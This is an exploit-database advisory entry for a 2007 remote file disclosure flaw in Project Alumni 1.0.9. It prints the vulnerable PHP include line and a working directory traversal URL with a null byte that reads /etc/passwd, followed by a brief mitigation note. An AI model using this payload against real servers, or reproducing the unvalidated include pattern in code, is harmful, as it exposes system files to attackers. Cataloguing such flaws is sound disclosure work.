header-logo
Suggest Exploit
vendor:
Project Alumni
by:
tomplixsee
N/A
CVSS
MEDIUM
Remote File Disclosure
22
CWE
Product Name: Project Alumni
Affected Version From: 1.0.9
Affected Version To: 1.0.9
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Project Alumni 1.0.9 Remote File Disclosure Vulnerability

The vulnerability allows an attacker to disclose files on the server by manipulating the 'act' parameter in the URL. By using directory traversal techniques, the attacker can access sensitive files, such as the /etc/passwd file. The exploit URL is: http://victim/path/index.php?act=../../../../../../etc/passwd%00

Mitigation:

The vulnerability can be mitigated by implementing proper input validation and sanitization. It is recommended to update to a newer version of the software that includes a patch for this vulnerability.
Source

Exploit-DB raw data:

project alumni 1.0.9 remote file disclosure vulnerability
download : https://sourceforge.net/projects/project-alumni/

vulnerable code on index.php
include($_SERVER['DOCUMENT_ROOT'] . "/pages/" . $_GET['act'] . ".page.inc.php");

exploit :
http://victim/path/index.php?act=../../../../../../etc/passwd%00

discovered by tomplixsee

# milw0rm.com [2007-11-27]